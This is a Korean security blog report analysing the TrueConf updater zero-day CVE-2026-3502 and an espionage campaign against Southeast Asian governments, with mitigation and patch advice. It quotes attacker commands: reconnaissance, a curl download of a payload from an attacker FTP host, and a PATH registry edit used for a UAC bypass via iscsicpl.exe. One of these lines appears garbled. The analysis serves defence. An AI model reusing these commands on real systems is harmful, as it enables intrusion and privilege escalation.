DEEP DIVE REPORT

TrueConf Zero-Day 취약점 - 아시아 정부 공격 사례 분석

SecurityDesk
2026.04.05 조회 20

요약

CVE-2026-3502는 TrueConf 클라이언트 애플리케이션의 업데이터 유효성 검사 메커니즘 결함으로 인해 발생하는 제로데이 취약점이다. CVSS 점수 7.8로 평가되며, 공격자가 온프레미스 TrueConf 서버를 제어할 경우 연결된 모든 엔드포인트에 임의의 파일을 배포하고 실행할 수 있다. 이 취약점은 "TrueChaos"라는 작전명으로 동남아시아 정부 기관을 대상으로 악용되었으며, 중국 넥서스 위협 행위자와 관련성이 있는 것으로 분석된다. TrueConf는 2026년 3월 버전 8.5.3에서 패치를 출시했다.

취약점 개요

CVE ID: CVE-2026-3502
CVSS 점수: 7.8
취약점 유형: Download of Code Without Integrity Check (CWE-494)
영향 버전: TrueConf Windows Client 8.5.2 이전
패치 버전: TrueConf Windows Client 8.5.3 이상
CISA KEV 등록일: 2026년 4월 2일
마감일: 2026년 4월 16일

기술적 분석

취약점 원인

TrueConf 클라이언트가 시작될 때, 연결된 온프레미스 서버에서 사용 가능한 업데이트를 확인한다. 서버에 설치된 버전보다 새로운 클라이언트 버전이 있는 경우, 애플리케이션은 사용자에게 업데이트를 다운로드하라는 메시지를 표시한다. 업데이트 패키지는 https://{trueconf_server}/downlods/trueconf_client.exe에서 다운로드되며, 이는 서버의 C:\Program Files\TrueConf Server\ClientInstFiles\에 저장된 파일에 매핑된다.

취약점은 업데이트 흐름에서 무결성 및 인증 검사가 부족하기 때문에 발생한다. 온프레미스 TrueConf 서버를 제어하는 공격자는 예상된 업데이트 패키지를 임의의 실행 파일로 교체할 수 있으며, 현재 애플리케이션 버전으로 표시하여 연결된 모든 클라이언트에 배포할 수 있다. 클라이언트는 적절한 검증 없이 서버 제공 업데이트를 신뢰하기 때문에, 악의적인 파일이 정상적인 TrueConf 업데이트로 위장하여 전달되고 실행될 수 있다.

실제 악용 방식

감염은 TrueConf 클라이언트 애플리케이션이 시작될 때 시작되었다. 공격자는 대상에게 보낸 링크를 통해 이미 설치된 TrueConf 클라이언트가 실행되었으며, 새로운 버전을 사용할 수 있다는 업데이트 프롬프트를 표시했다.

피해자의 상호작용 전에, 공격자는 이미 TrueConf 온프레미스 서버의 업데이트 패키지를 무기화된 버전으로 교체했다. 이로 인해 클라이언트가 정상적인 업데이트 프로세스를 통해 악의적인 파일을 검색하게 되었다.

손상된 TrueConf 온프레미스 서버는 정부 IT 부서에서 운영되었으며, 전국 수십 개의 정부 기관에 비디오 회의 플랫폼을 제공했다. 이들 모두 동일한 악의적인 업데이트를 받았다.

다운로드된 패키지 분석 결과, 이는 무기화된 클라이언트 업데이트였다. 설치는 Inno Setup으로 빌드되었다. 정상적인 TrueConf 설치 구성 요소와 함께 패키지는 c:\programdata\poweriso\ 경로에 양성적인 poweriso.exe 실행 파일과 악의적인 7z-x64.dll 파일을 배치했으며, 이는 DLL 사이드로딩을 통해 로드되었다.

악의적인 7z-x64.dll 임플란트를 사용하여 공격자는 정찰, 환경 준비, 지속성 및 추가 페이로드 검색에 중점을 둔 일련의 키보드 조작을 수행했다.

초기 정찰 활동

  • tasklist > cache
  • tracert 8.8.8.8 -h 5

추가 페이로드 다운로드

FTP 서버에서 추가 로더 isciexe.dll을 다운로드하고 %temp% 디렉토리에 추출:

curl -u ftpuser: ftp://47.237.15[.]197/update.7z -o c:\program files\winrar\winrar.exe x update.7z -p

UAC 우회

공격자는 Microsoft iSCSI Initiator Control Panel 도구를 사용하여 UAC 우회를 수행하기 위해 현재 사용자의 PATH 변수를 수정했다:

reg add "hkcu\environment" /v path /t REG_SZ /d "C:\users\<user>\appdata\local\temp" /f
c:\windows\system32\cmd.exe
c:\windows\syswow64\iscsicpl.exe

iscsicpl.exe는 32비트 SysWOW64 버전이 자동으로 상승되고 iscsiexe.dll에 대한 DLL 검색 순서 하이재킹에 취약하기 때문에 UAC 우회에 악용될 수 있는 합법적인 Windows 바이너리다. 사용자의 %PATH%를 통해 참조되는 사용자 제어 위치에 악의적인 iscsiexe.dll을 배치함으로써 공격자는 상승된 iscsicpl.exe의 컨텍스트에서 Windows가 해당 DLL을 확인하고 로드하게 할 수 있으며, 이로 인해 UAC 프롬프트 없이 권한 상승이 발생한다.

다운로드된 update.7z 아카이브에는 합법적인 7z.exe 바이너리와 iscsiexe.dll이 포함되어 있었다. iscsiexe.dll 구성 요소는 침해 후 워크플로우의 일부로 사용되는 도구였다. Check Point Research는 또한 rom.dat라는 암호화된 7z 아카이브를 포함한 아카이브의 추가 변형을 확인했다.

iscsiexe.dll 구성 요소는 단순한 사용자 지정 지속성 및 권한 상승 도구로 보인다. 완전한 기능 백도어가 아니라 감염 체인 초기에 배치된 poweriso.exe 바이너리의 winexec.exe 실행을 유지하는 역할로 제한되었다.

대응 전략

즉시 조치

  1. 버전 업데이트: TrueConf Windows Client를 버전 8.5.3 이상으로 즉시 업데이트
  2. 서버 보강: 온프레미스 TrueConf 서버의 무결성 검증 및 접근 제어 강화
  3. 감염 여부 확인: 다음 IOC를 기반으로 감염 여부 검증

장기적 조치

  1. 업데이트 메커니즘 검증: 모든 소프트웨어 업데이트 프로세스에서 코드 서명 및 무결성 검사 의무화
  2. 네트워크 분리: 민감한 시스템에서 온프레미스 솔루션 사용 시 엄격한 네트워크 분리 및 모니터링
  3. 보안 모니터링: TrueConf 관련 프로세스 및 파일 시스템 활동 모니터링 강화

패치 가이드

TrueConf는 취약점을 수정한 버전 8.5.3을 2026년 3월에 출시했다. 다음 단계를 따라 업데이트:
1. TrueConf 공식 웹사이트에서 최신 버전 다운로드
2. 업데이트 전 현재 시스템 감염 여부 확인
3. 정식 업데이트 경로를 통해서만 설치
4. 업데이트 후 시스템 재부팅 및 검증

벤치마크 사례

ShadowPad 악성코드 프레임워크

같은 피해 기관이 동일한 시기에 ShadowPad 악성코드 프레임워크의 표적이 되었다. 이는 운영자 도구의 겹침, 공유 액세스, 또는 동일한 조직을 표적으로 하는 여러 중국 정렬 행위자의 존재를 나타낼 수 있다. ShadowPad는 중국 넥서스 위협 행위자들이 자주 사용하는 복잡한 백도어로, 장기적인 지속성 및 데이터 탈취에 사용된다.

Amaranth Dragon

Check Point Research가 최근 문서화한 Amaranth Dragon 활동에서도 유사한 중국 넥서스 위협 행위자의 활동이 관찰되었다. 이들은 다양한 제로데이 취약점을 악용하여 표적 스파이 활동을 수행했다.

참고문헌

  1. Check Point Research - Operation TrueChaos: 0-Day Exploitation Against Southeast Asian Government Targets
    https://research.checkpoint.com/2026/operation-truechaos-0-day-exploitation-against-southeast-asian-government-targets/

  2. NVD - CVE-2026-3502
    https://nvd.nist.gov/vuln/detail/CVE-2026-3502

  3. CISA - Known Exploited Vulnerabilities Catalog
    https://www.cisa.gov/known-exploited-vulnerabilities-catalog

  4. TrueConf - Update 8.5
    https://trueconf.com/blog/update/trueconf-8-5

  5. MITRE - CWE-494: Download of Code Without Integrity Check
    https://cwe.mitre.org/data/definitions/494.html

  6. LOLBAS - Iscsicpl
    https://lolbas-project.github.io/lolbas/Binaries/Iscsicpl/

본 콘텐츠는 AI 기술로 생성된 분석 리포트를 포함하고 있습니다. 내용 중 사실과 다르거나 보완이 필요한 정보를 발견하시면 댓글을 통해 소중한 의견 부탁드립니다. 여러분의 피드백은 더 정확한 보안 정보 공유에 큰 도움이 됩니다.

← 목록으로 돌아가기

댓글 (0)

댓글을 작성하려면 로그인이 필요합니다.

로그인

아직 댓글이 없습니다.

첫 번째 댓글을 작성해보세요!

IT 도구 서랍

→ Unix: 2025-01-15T09:30:00
→ 날짜: 1736934600

→ ASCII: ABC
→ 문자: 65 66 67

ASCII 코드표 — 클릭하면 입력란에 추가

제어 문자 (0–31)

DecHex약어설명

출력 가능 문자 (32–126)

DecHex문자

확장 ASCII (128–255)

DecHex문자

→ 유니코드: 홍길동
→ 문자: \ud64d\uae38\ub3d9